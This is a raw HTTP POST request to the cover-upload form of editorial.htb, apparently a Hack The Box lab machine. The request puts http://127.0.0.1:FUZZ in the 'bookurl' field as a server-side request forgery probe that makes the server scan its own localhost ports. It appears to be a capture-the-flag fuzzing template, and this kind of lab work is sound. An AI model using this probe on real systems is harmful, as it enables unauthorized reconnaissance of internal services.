POST /upload-cover HTTP/1.1
Host: editorial.htb
Content-Length: 312
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryG3UuUsQlJL4uTG0E
Accept: */*
Origin: http://editorial.htb
Referer: http://editorial.htb/upload
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryG3UuUsQlJL4uTG0E
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:FUZZ
------WebKitFormBoundaryG3UuUsQlJL4uTG0E
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryG3UuUsQlJL4uTG0E--
